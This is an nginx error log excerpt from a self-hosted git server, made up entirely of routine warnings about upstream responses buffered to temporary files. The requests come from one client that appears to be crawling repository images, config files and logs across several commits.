2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/72/0000004721 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/72/0000004722 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/72/0000004723 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:32:08 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/72/0000004724 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fimages%2Fdcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fimages%2Fdcsintegration.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:35:47 [warn] 833#833: *22453 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/72/0000004725 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:31:51 [warn] 829#829: *22652 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/72/0000004726 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:32:21 [warn] 829#829: *22667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/72/0000004727 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:32:21 [warn] 829#829: *22667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/72/0000004728 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:32:32 [warn] 829#829: *22681 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/72/0000004729 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:32:32 [warn] 829#829: *22681 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/73/0000004730 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:32:32 [warn] 829#829: *22681 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/73/0000004731 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:33:15 [warn] 832#832: *22698 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/73/0000004732 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:33:15 [warn] 832#832: *22698 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/73/0000004733 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:33:24 [warn] 832#832: *22715 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/73/0000004734 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:33:25 [warn] 832#832: *22715 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/73/0000004735 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:13 [warn] 833#833: *22860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/73/0000004736 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:13 [warn] 833#833: *22860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/73/0000004737 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:14 [warn] 833#833: *22860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/73/0000004738 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:53 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/73/0000004739 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:54 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/74/0000004740 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:54 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/74/0000004741 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:54 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/74/0000004742 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 15:35:55 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/74/0000004743 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1", host: "git.hanmocnn.co.kr"
2026/02/15 15:36:10 [warn] 833#833: *22924 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/74/0000004744 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:36:10 [warn] 833#833: *22924 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/74/0000004745 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/74/0000004746 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr"
2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/74/0000004747 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000", host: "git.hanmocnn.co.kr"
2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/74/0000004748 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=800", host: "git.hanmocnn.co.kr"
2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/74/0000004749 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr"
2026/02/15 15:38:50 [warn] 827#827: *23101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/75/0000004750 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:38:50 [warn] 827#827: *23101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/75/0000004751 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:39:41 [warn] 827#827: *23113 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/75/0000004752 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:39:41 [warn] 827#827: *23113 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/75/0000004753 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:41:13 [warn] 828#828: *23143 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/75/0000004754 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:42:47 [warn] 829#829: *23170 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/75/0000004755 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:43:19 [warn] 829#829: *23176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/75/0000004756 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:44:30 [warn] 829#829: *23192 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/75/0000004757 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:44:45 [warn] 832#832: *23201 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/75/0000004758 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:44:45 [warn] 832#832: *23201 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/75/0000004759 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:45:19 [warn] 832#832: *23210 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/76/0000004760 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:45:37 [warn] 832#832: *23226 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/76/0000004761 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:46:08 [warn] 833#833: *23235 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/76/0000004762 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:46:08 [warn] 833#833: *23235 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/76/0000004763 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:46:29 [warn] 830#830: *23242 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/76/0000004764 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:46:29 [warn] 830#830: *23242 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/76/0000004765 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:46:39 [warn] 830#830: *23250 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/76/0000004766 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:47:11 [warn] 830#830: *23258 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/76/0000004767 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:47:26 [warn] 833#833: *23266 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/76/0000004768 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 15:50:06 [warn] 833#833: *23277 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/76/0000004769 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 17:59:08 [warn] 839#839: *23677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/77/0000004770 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 19:16:20 [warn] 843#843: *25327 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/51/0000005515 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 19:17:46 [warn] 843#843: *25337 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/51/0000005516 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 19:18:14 [warn] 843#843: *25344 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/51/0000005517 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 19:19:10 [warn] 841#841: *25348 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/51/0000005518 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
